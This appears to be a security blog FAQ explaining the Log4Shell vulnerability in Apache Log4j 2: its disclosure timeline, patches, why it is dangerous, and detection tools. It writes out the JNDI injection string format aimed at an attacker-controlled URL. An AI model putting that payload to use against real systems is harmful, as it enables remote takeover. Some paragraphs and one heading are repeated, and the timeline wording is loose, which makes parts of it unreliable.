Sinevis Blog header

What is Apache Log4J Vulnerability?

Log4Shell is a severe critical vulnerability affecting many versions of the Apache Log4j application. The vulnerability allows unauthenticated remote code execution. Attackers can take advantage of it by modifying their browser’s user-agent string to ${jndi:ldap://[attacker_URL]} format. This vulnerability can be found in products of some of the most famous technology vendors such as AWS, IBM, Cloudflare, Cisco, iCloud, Minecraft: Java Edition, Steam, and VMWare.

On December 9th, 2021, it was made public via the project’s GitHub website. This issue affects Apache Log4j 2 versions 2.0 to 2.14.1, as identified by Chen Zhaojun of Alibaba Cloud Security Team. NIST published a critical CVE in the National Vulnerability Database on December 10th, 2021, naming this as CVE-2021-44228.

The highest severity score available, 10, has been determined as the official CVSS base severity score.

When did experts discover the original vulnerability in the Log4j 2 library?

Security researcher Chen Zhaojun of Alibaba, China’s largest e-commerce company, first reported the vulnerability to the Apache Foundation (an open-source project) on November 24. They discovered the attack December 9 on servers that host the game Minecraft. After further forensic analysis, they realized cybercriminals discovered the gap earlier, and have exploited it since at least December 1, 2021.

Since December 10, days after industry experts discovered a critical vulnerability known as Log4Shell in servers supporting the game Minecraft, bad actors have made millions of exploit attempts of the Log4j 2 Java library, according to one team tracking the impact. The vulnerability is a potential threat to millions more applications and devices across the globe.

In this article, we’ll answer some frequently asked questions about the Log4j vulnerability. We will continue to add more answers as new questions come up.

What is Log4Shell?

Log4Shell is a software vulnerability in Apache Log4j 2, a popular Java library for logging error messages in applications. The vulnerability, published as CVE-2021-44228, enables a remote attacker to take control of a device on the internet if the device is running certain versions of Log4j 2.

Apache issued a patch for CVE-2021-44228, version 2.15, on December 6, 2021. However, this patch left part of the vulnerability unfixed, resulting in CVE-2021-45046 and a second patch, version 2.16, released on December 13. Apache released a third patch, version 2.17, on December 17 to fix another related vulnerability, CVE-2021-45105. They released a fourth patch, 2.17.1, on December 28 to address another vulnerability, CVE-2021-44832.

Attackers can exploit the vulnerability using text messages to control a computer remotely. The Apache Software Foundation, which publishes the Log4j 2 library, gave the vulnerability a CVSS score of 10 out of 10, the highest-level severity score, because of its potential for widespread exploitation and the ease with which malicious attackers can exploit it. While mitigation evolves and the damage unfolds, the fundamentals of the Log4j vulnerability won’t change.

 

When did experts discover the original vulnerability in the Log4j 2 library?

Log4Shell is considered a zero-day vulnerability because malicious actors likely knew about and exploited it before experts did.

What makes the log4j vulnerability so dangerous is how ubiquitous the Log4j 2 library is. It’s present in major platforms from Amazon Web Services to VMware, and services large and small. The web of dependencies among affected platforms and services means patching can be a complex and possibly time-consuming process.

In particular, it’s the ease of exploiting the vulnerability that compounds its impact. The Log4j 2 library controls how applications log strings of code and information. The vulnerability enables an attacker to gain control over a string and trick the application into requesting and executing malicious code under the attacker’s control. As a result, attackers can remotely take over any internet-connected service that uses certain versions of the Log4j library anywhere in the software stack.

Log4j Vulnerability Scanning & Detection Tools

We should always think if we’re using software that has the Log4j component, it could be affected. We’re sharing some useful tools for you to help detect Log4j vulnerabilities. However, we want to clarify one thing: If these tools could not find anything at the moment, it does not mean that we’re safe. All tools and systems are still updating, new CVEs are being added. So, we need to follow updates, news, and details every day.

What makes the log4j vulnerability so dangerous is how ubiquitous the Log4j 2 library is. It’s present in major platforms from Amazon Web Services to VMware, and services large and small. The web of dependencies among affected platforms and services means patching can be a complex and possibly time-consuming process.

In particular, it’s the ease of exploiting the vulnerability that compounds its impact. The Log4j 2 library controls how applications log strings of code and information. The vulnerability enables an attacker to gain control over a string and trick the application into requesting and executing malicious code under the attacker’s control. As a result, attackers can remotely take over any internet-connected service that uses certain versions of the Log4j library anywhere in the software stack.

Five Best Tools to Keep Log4j Vulnerability Exploitations At Bay

  • Microsoft 365 Defender
  • Google’s Cloud Logging detection
  • JFrog OSS tools for Log4j
  • WhiteSource Log4j
  • CrowdStrike Archive Scan Tool

1 thought on “What is Apache Log4J Vulnerability?”

Leave a Comment

Your email address will not be published.

Just a step away from recieving it in your inbox

Scroll to Top